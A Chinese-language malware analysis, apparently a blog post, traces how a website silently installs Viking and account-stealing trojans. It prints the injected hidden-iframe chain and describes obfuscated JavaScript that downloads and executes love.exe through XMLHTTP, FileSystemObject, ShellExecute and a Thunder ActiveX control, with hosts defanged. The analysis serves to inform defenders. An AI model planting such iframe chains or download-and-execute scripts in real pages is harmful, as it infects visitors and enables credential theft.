一个会下载至少3个Viking等恶意程序的网站

简介: 一个会下载至少3个Viking等恶意程序的网站

有网友说他的电脑打开某个网站后不久,杀毒软件的实时监控被关闭,系统时间被修改,接着安装各种网络游戏和聊天账号的盗号木马。

检查该网站首页代码,发现:

/---
if(parent.window.opener) parent.window.opener.location='hxxp://aa***a.sqr***s11**0.com/';
……(略)……
<SCRIPT src="hxxp://m***a.china**s*es*e.net/top.js"></SCRIPT>
---/

hxxp://sqr***s1**.s**e*771.com/ 包含代码:

/---
<iframe src="hxxp://m***a.china**s*es*e.net/110.htm" width="0" height="0" frameborder="0"></iframe>
---/

110.htm包含代码:

/---
<iframe src="hxxp://wg***.72***9*72.com/index.htm" width="0" height="0" frameborder="0"></iframe>
---/

index.htm包含代码:

/---
<iframe src="hxxp://union**.0***kis.com/in.htm?7141" width="0" height="0" frameborder="0"></iframe>
---/

in.htm?7141 包含代码:

/---
<script src=css.js></script>
<html>
<title>
test
</title>
<body>
<iframe src=test.htm width=0 height=0></iframe>
test
</body>
</html>
---/
css.js 的内容为用eval()执行自定义函数,经过2次解密,得到JavaScript代码,利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 love.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';}
---/

生成,即***.exe(其中*为数字),然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/***.exe 来运行。

test.htm 包含代码:

/---
<head>
<title>test</title>
<script src="test.js"></script>
</head>
<script>
exec();
</script>
</body>
---/

test.js 的内容未加密,使用ActiveXObject("ThunderServer.webThunder.1")下载 love.exe,保存到 c:/,并使用定时器来运行。


相关文章
|
12月前
|
Java 开发者
JAVA高手必备:URL与URLConnection,解锁网络资源的终极秘籍!
在Java网络编程中,URL和URLConnection是两大关键技术,能够帮助开发者轻松处理网络资源。本文通过两个案例,深入解析了如何使用URL和URLConnection从网站抓取数据和发送POST请求上传数据,助力你成为真正的JAVA高手。
235 11
|
测试技术 API
阿萨学工具:用Apifox 发送接口请求
阿萨学工具:用Apifox 发送接口请求
430 0
|
关系型数据库 MySQL Java
Mysql开启ssl加密协议及Java客户端配置操作指南
本文主要讲述的是Mysql开启了ssl协议之后,Java客户端如何正确的链接Mysql访问数据
Mysql开启ssl加密协议及Java客户端配置操作指南
|
开发框架 .NET C#
C#数据去重的这几种方式,你知道几种?
C#数据去重的这几种方式,你知道几种?
147 0
|
存储 算法 编译器
【C++ 函数 基础教程 第四篇】深入C++函数返回值:理解并优化其性能
【C++ 函数 基础教程 第四篇】深入C++函数返回值:理解并优化其性能
895 1
|
编解码 自然语言处理 前端开发
PC端高倍屏适配方案实践
随着PC端屏幕的发展,PC端也逐步出现了更高倍数的屏幕,相对于手机端的Retina屏,PC端也出现了多倍数适配的要求,本文主要是PC端高倍屏幕适配方案的一个实践总结,希望能给对PC端有适配高倍屏幕需求的同学有一些思路的启发和借鉴
417 0
|
Shell 测试技术
把书读薄-Shell入门基础
把书读薄-Shell入门基础
142 0
|
弹性计算 容器
AutoScaling 支持从实例启动模板创建实例
伸缩组与实例启动模板的结合,使得您能够利用实例启动来管理伸缩组的启动配置,将实例启动模板的版本管理引入到伸缩组的配置管理中,同时,使用动态的版本管理策略,使得您能够通过管理实例启动模板的方式来对伸缩组进行调整,大大降低了您操作的复杂性,提高了灵活性,也使您的机器配置的演进过程更加清晰和快捷。
1576 1
|
移动开发 大数据
2017年那些刷屏朋友圈的H5案例们(Top15)
2017年秀H5赏析。排名不分先后。尽可能多得挑选了不同展现形式、或是不同行业的案例。
6841 0
下一篇
开通oss服务